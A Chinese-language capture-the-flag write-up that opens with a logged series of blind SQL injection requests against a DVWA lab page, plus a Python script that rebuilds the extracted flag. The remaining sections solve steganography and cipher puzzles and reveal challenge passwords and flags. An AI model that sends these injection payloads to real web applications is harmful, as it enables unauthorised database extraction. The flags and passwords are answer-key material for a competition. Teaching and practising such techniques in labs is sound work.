GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),28,1))>52 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),28,1))>54 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),28,1))>55 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),29,1))>47 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),29,1))>87 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),29,1))>107 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),29,1))>117 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),29,1))>122 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),29,1))>125 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),29,1))>123 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),29,1))>124 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),30,1))>64 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),30,1))>32 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),30,1))>1 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(id AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>64 AND 'ouwc'='ouwc&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(id AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>32 AND 'ouwc'='ouwc&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(id AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>48 AND 'ouwc'='ouwc&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(id AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>56 AND 'ouwc'='ouwc&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(id AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>52 AND 'ouwc'='ouwc&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(id AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>50 AND 'ouwc'='ouwc&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(id AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>49 AND 'ouwc'='ouwc&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(id AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),2,1))>47 AND 'ouwc'='ouwc&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(id AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),2,1))>1 AND 'ouwc'='ouwc&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
编写 python exp:
import re
# 初始化
flag = ""
index = 1
ascs = [0, 0]
with open("my.txt", "r") as f:
lines = f.readlines()
for i in range(0, len(lines), 2):
try:
# 提取关键 payload 片段
# lines[i] 表示从文件中读取的文本内容中的第 i 行(从零开始计数)
payload = re.search(r"\d+,1\)\)>\d+", lines[i]).group()
# 提取索引值
_index = int(re.search("\d+", payload).group())
if _index > index:
index = _index
if ascs[0] < ascs[1]:
if code == 200:
flag += chr(ascs[1] + 1)
else:
flag += chr(ascs[1])
else:
if code == 200:
flag += chr(ascs[0])
else:
flag += chr(ascs[1])
print(flag)
# 从第二个元素开始到最后一个元素的子序列。因为匹配到的字符串的第一个字符是大于号 >,而我们只需要提取其中的数字部分。
asc = int(re.search(">\d+", payload).group()[1:])
# 将新提取到的 ASCII 码值添加到列表 ascs 的末尾,并移除列表中的第一个元素,以确保 ascs 列表中始终只包含两个元素,这两个元素分别代表最近两次提取到的 ASCII 码值。
ascs.pop(0)
ascs.append(asc)
code = int(re.search("\d\d\d", lines[i + 1]).group())
# 当捕获到异常时不做任何操作
except:
pass
拿到 flag:flag{hAcker_sq1map_test0_@67}
5、Bieber&Troye
附件是一个加密的压缩包,提示密码已经在视频中给出
链接是一个视频
电脑上会默认跳过视频结尾的几帧,因此这里要使用手机打开,在结尾可以看到如下信息:
利用已知密码和信息,直接进行掩码攻击
得到密码为:@@@qwq7890
使用密码解压压缩包,得到两张图片
使用 Stegsolve 工具分析
戳爷的 blue 最低位存在数据隐写(这张封面就是戳爷的专辑《Blue Neighbourhood》)
扫面二维码得到:
Bisa_bahasa_Indo_gak
这个肯定不是 flag,因为我们另一张图片还没有处理,多半只是一个密码
结合文件,这里让我们猜一下 flag
刚好有一个密码,又是 jpg 图片,使用 outguess 对其分析:
outguess -r bieber.jpg -k Bisa_bahasa_Indo_gak out.txt
数据提取成功,确实存在隐写
拿到 flag:flag{Forget_me_n0t_tea_aLLah}
6、Unmask The Joker
题目附件为txt文档、jpg图片和zip压缩包
hello.txt 似乎只是一个打招呼和提示的普通文档
尝试零宽隐写提取,并未发现什么
根据文档要求,我们需要先打开加密的压缩包(joker.zip),才能开启真正的挑战
最后一句有一定暗示:By the way, can you see anything on my face?
小丑的脸上应该有什么东西
经过不断尝试,这里是盲水印
得到密码:SNERT*2024*SWCTF
使用密码打开joker.zip
得到三个新的附件:png图片、txt文档,最难处理的是这个joker,并且文件类型未知
先看已知文件类型的,比如hint.txt
Ctrl+A全选,可以发现还存在一些不可见的东西
结合文字提示:有雪在下是难见的远方
雪?那就是snow隐写咯
密码是什么呢?这里也没有其他提示,那就只能用给的文本内容试试了
snow.exe -p 有雪在下是难见的远方 -C hint.txt
得到另一个密钥 AESkey:joker
再看这个direct.png
分析之后并没有发现藏什么东西
那么它也许只是一个方向指引的普通图片
图片上有什么信息呢?一双眼睛和一段文字,结尾沉默被标红了
那么这里我想暗示给大家的是一个工具:沉默的眼睛,也就是 SilentEye
对于做杂项的那么就算没有暗示也会用到这个工具的
接下来我们说这个joker文件
同样使用010editor打开
文件头看不出什么
看到文件尾:8D FF
倒序之后不就是妥妥的jpg文件头 FF D8
提取hex值(因为这里没有明确分界,保险起见我们提取所有的)
注意:在010editor里面,Ctrl+C或者Ctrl+V针对的是右边的ASCII码操作,如果你想要操作左边的hex十六进制值这需要多加一个shift,即复制为:Ctrl+shift+C,粘贴到左边hex值同理。
对hex值取倒序,这里使用Python脚本实现(还有很多其他方法也可以)
随便让ChatGPT写一个就行
def reverse_and_format_hex(hex_string):
# 去除可能存在的空格或其他分隔符
hex_string = hex_string.replace(" ", "").replace("\n", "")
# 对整个十六进制字符串进行反转
reversed_hex_string = hex_string[::-1]
# 每两位为一组,用空格隔开
formatted_hex_string = ' '.join([reversed_hex_string[i:i+2] for i in range(0, len(reversed_hex_string), 2)])
return formatted_hex_string
# 输入您的十六进制数据字符串
hex_data = ''''''
# 获取反转并格式化后的十六进制字符串
reversed_and_formatted_hex_data = reverse_and_format_hex(hex_data)
取倒序之后得到以 FF D8开头的hex值
新建十六进制文件,导入取倒序后的hex值,注意使用Ctrl+shift+V
由于是jpg头,因此我们另存为jpg文件
打开可以看到joker的头像
重新使用010editor打开该jpg,你就会看到jpg的高亮
为什么我要强调高亮,因为很多时候这个特性便于我们区分文件类型和hex值的位置
可以看到结尾有藏东西
正常的jpg以 FF D9 结束
现在知道常见文件头和文件尾的重要性了吧
同样进行提取和保存
这里无法判断文件类型,因此我们不加后缀
使用记事本(文本编辑器)打开
是一些奇奇怪怪的表情包
那么这个是什么呢,结合前面得到了一个AES的秘钥
通过检索相关内容,你就会知道这个其实是emoji的AES加密
使用在线网站解码:https://ruotian.io/2020/02/emoji-aes/
得到一串字符:floccinaucinihilipipification
似乎还是某个密码
有图片和密码,结合direct.png的暗示:沉默的眼睛,使用silenteye解密
找到flag:
flag{My_1ife_is_nothing_but_c0medy}
7、勇师傅的奇思妙想(加固版1)
附件如下
Myon.zip下有三个加密压缩包
先看 key.jpg
但是手机无法识别,使用 QR_Research扫描
得到 password:123456@Swctf
使用密码解压 Myon.zip
得到三个文件,其中两个压缩包都有密码,因此我们先看 world 文档
打开时出现了告警,说明这不只是一个单纯的 world,可能还藏有其他东西导致打开时出错
点击是即可打开
根据描述这应该是打开 bx.zip 的秘钥
但是文字看不懂,采用图片识别,看看能不能找到类似的东西
可以找到很多
这里要注意对 world 内图片的保存方式,尽量不要直接复制粘贴,这样会很大程度的降低画质质量,导致无法正确识别图像内容,我在 world 里也有作说明提醒。
搜集信息后你会知道这是一种游戏的文字,叫 希卡文(也对应了world文件名hika)
好心的楼主还给你们提供了解码网站:https://kinglisky.github.io/zelda-words/index.html
解码得到 manchester
使用该密码即可打开 bx.zip
解压后其中两个压缩包都有密码,流量包不存在密码可以直接打开
查看 hi.txt文件
提示可以从流量包找到 run.zip 的秘钥
这个有点困难
是否还记得我前面说过的这个 world 文档打开时有问题
使用 010editor 打开 world
可以看到它是一个 PK 头,这是压缩包的标志
(其实world和zip文件头是一样的,实质就是由一些目录构成)
将 world 修改后缀为 zip 打开
其中有四个都是自带的,但是多出了一个未知格式的文件 my
解压该文件并打开
由于不知道文件格式,我们先使用记事本打开
有两个敏感信息,svg 标签和 alert 弹窗函数
svg 是一种图像格式的后缀(可缩放矢量图形)
我们补上后缀,双击打开
点击 click me 后出现弹窗
得到 mykey:*0*XSS@666
也就是 my.zip 的密码
使用密码解压对应压缩包 my.zip
得到一张图片 hint.png
有一个时钟信号 clk ,数据信号 dat,还有一个未知的信号
时钟信号和输入信号都有了,那么最后一个大概率就是输出信号
我们目前还不知道这是一种什么规则或者加密方式
时钟信号为规律的周期方波信号
对于输入输出信号,我们假设高电平为1,低电平为0,从 dat 变到 ?
根据图像我们可以看出:高电平被分成了高和低,低电平被分成了低和高
推导出这幅图描述的规则:1 被加密成了 10,0 被加密成了 01
查询后得知,这是曼彻斯特编码的一种
还记得前面解密的希卡文吗?manchester
进一步验证了我们的推测是正确的
这个确实有点为难大家了,浅当是勇师傅个人的奇思妙想吧。
接下来我们就需要直面流量包了
这个其实是之前一个比赛的附件
关于这个流量包详细的溯源步骤请参考我前面的博客:
通过溯源用户名和内网IP
最终我们得到秘钥为:www-data_172.17.0.2
使用该密码解压 run.zip,得到一个可执行程序 run.exe
看这个图标应该是Python写的
我不是很清楚这里对于学逆向的同学会不会更有优势
我让一个学逆向的朋友大致看了下,说并未泄露什么因此也就没做更改
双击打开提示我们输入点东西
随便输一下,并不能得到什么有用信息
此时我们还剩下最后一个附件 in.zip
需要密码,因此我们先用 010 editor 打开看看
出现了报错,那么这个 zip 肯定藏了什么东西或者做了什么改动
拉到结尾发现隐藏字符串信息
==AMtVmTF5GMtVmO5V2a
大小写字母和数字,看起来像 base64
但是两个等号却在开头,我们知道 base64 的等号只可能补充在结尾
猜测颠倒了顺序,因此对字符串取倒序
得到 a2V5OmVtMG5FTmVtMA==
base64 解码得到
key:em0nENem0
使用秘钥解压 in.zip
得到 secret.png
我本来是想做一个幻影坦克,但是不太会调参数
很容易可以看到中央有一个小丑脸的重影
细致一点看(把图像放大)
这里是有东西的
如果实在还是看不清楚,大致调节一下亮度和对比度
、
现在看起来就很清晰了
内容为:@laughing!
想到压缩包名为 in.zip
那么这个应该就是我们需要输入 exe 程序的内容
输入之后回车
果然弹出一串数据:
0110100101101001EE0110100110100101EE0110100101010110EE0110100101101010EE0110101010011010EE0101101001010110EE0110011010101010EE0110010110011001EE0110101001100110EE0110101001011010EE0110101001100101EE0110011010101010EE0110100110010101EE0101101001010101EE0110101001010101EE0110100101100110EE0110011010101010EE0110100110100110EE0110011010010110EE0110011010101010EE0110100101100101EE0110100101100110EE0110100101010110EE0110011001100101EE0110100110010101EE0110011010101010EE0110100110100110EE0110010101010110EE0110100110011010EE0110100101100110EE0110101001011010EE0110011010101010EE0110100110100110EE0110100110101010EE0110011001011001EE0110100101100110EE0110011010101010EE0110100101011010EE0110010101100110EE0110100110101001EE0110101001100101EE0110101001011010EE0110011010101010EE0110101001100101EE0110100110010101EE0110100101010110EE0110100110101001EE0110100110100110EE0110101010010110EE0110100110100101EE0110100110010110EE0110100101101001EE0110100101100110EE0110101010100110
是01的编码,正好对应前面 hint.png 的曼彻斯特编码
但是其中有EE,这里需要剔除
使用记事本即可实现,将EE替换为空
得到
011010010110100101101001101001010110100101010110011010010110101001101010100110100101101001010110011001101010101001100101100110010110101001100110011010100101101001101010011001010110011010101010011010011001010101011010010101010110101001010101011010010110011001100110101010100110100110100110011001101001011001100110101010100110100101100101011010010110011001101001010101100110011001100101011010011001010101100110101010100110100110100110011001010101011001101001100110100110100101100110011010100101101001100110101010100110100110100110011010011010101001100110010110010110100101100110011001101010101001101001010110100110010101100110011010011010100101101010011001010110101001011010011001101010101001101010011001010110100110010101011010010101011001101001101010010110100110100110011010101001011001101001101001010110100110010110011010010110100101101001011001100110101010100110
找一个在线网站
注意模式的选择
解码得到
011001100110110001100001011001110111101100110001010111110100101001110101011100110111010001011111011010000011000001110000011001010101111101101101010110010101111101100100011001010110000101010100011010000101111101101101010000010110101101100101011100110101111101101101011011110101001001100101010111110110001101000101011011100111010001110011010111110111010001101000011000010110111001101101011110010110110001101001011001100110010101111101
现在所有附件都用完了,那么单纯的01数字组成的编码是什么呢?
并且这里没有分割,因此排除摩斯加密
那么大概率就是二进制了
将二进制转 ASCLL 码
得到 flag{1_Just_h0pe_mY_deaTh_mAkes_moRe_cEnts_thanmylife}
8、勇师傅的奇思妙想(加固版2)
图片存在盲水印,得到关于图片压缩包密码的信息
这种告诉了部分密码的一般采用掩码攻击
目前没得到压缩包,那么图片里应该存在隐藏文件
分离出了两个压缩包
对包含图片的那个压缩包进行掩码攻击
拿到密码 snert2024
使用密码解压压缩包得到三个图片文件
hint.jpg 存在条形码
直接扫
rabbit key from chessboard
兔子密钥来自棋盘(有一种加密方式叫 rabbit 加密)
half.jpg 是一半的二维码
还有一个 touch.gif
可以看到有类似五子棋的东西滑过
动图我们常规的处理方法就是拆分成帧然后拼接:
可以写脚本也可以用在线网站
接下来我们找一个合并图片的网站:
动图是从右往左的,因此这里是水平合并
下载合并好后的图片
看起来像五子棋,但是这里其实是盲文,文件名叫 touch,叫你触摸,而不是看,盲文就是靠摸的
浅浅对照一下:
braille(正好就是盲文这个单词)
结合前面 hint 的提示:兔子密钥来自棋盘
那么这个单词 braille 应该就是某个 rabit 密文的秘钥
但是我们目前没有密文(另一个压缩包里倒是有一个secret.txt)
而另一个压缩包是加密的,因此我们前面应该还遗漏了还有东西
继续测试,从 half.jpg里面分离出了一张 png 图片,正好是另一半二维码
但是仔细一看,这个定位符颜色都不一样
刚好是相反的,因此我们只需要对其中一张取负色后拼接即可
对右半部分取负色
拼接
扫描
U2FsdGVkX1+rigzBYkaG0L8K9/jNCHhnwmPWbBCvUW0=
猜测就是前面说的 rabbit 加密
解码成功,得到:Quetoutaillebien
使用该密码即可打开另一个压缩包
压缩包又是加密的,因此我们先看 txt 文件
根据对应规则可以判断前者是维吉尼亚加密,后者 key 是当铺密码:
先将 key 解出来:
741585369
15853
24862
7415963
对应手机键盘的数字推出对应字母:
MYON
结合密文进行维吉尼亚解密:
得到:thisispassword
使用密码解压压缩包
图片 blue 0 色道存在二维码
解码得到 key:n0thingimp0rtant
使用 key 打开 name 的压缩包
打开 word
说有一份名单,但是我们什么都没看到
选项里面勾上隐藏文字
有新东西
调整字体颜色
得到:
Quincy
Frank
david
lucas
Miles
William
Matthew
wyatt
Tyler
Wesley
Vaughn
flynn
Vance
Daniel
Blake
felix
Uriah
0scar
5tephen
Frederick
Ulric
leo
Quentin
=liot
这里是藏头诗,根据字符特征可以判断为 base64
提取名单首字符,得到密文:
QFdlMWMwTWVfVDBfU05FUlQ=
解码得到:
@We1c0Me_T0_SNERT
使用密码解压 flag.zip
存在隐藏信息:
cNalVNrhNA5JTPJJnJ3x0Lo3TRn-mPJxdPZxNA4t5QpxnR1-hMKBcTE++
XX 解码
拿到 flag:flag{Y0u_mUsT_B_A_w0rm_in_Y0nGs_st0mach}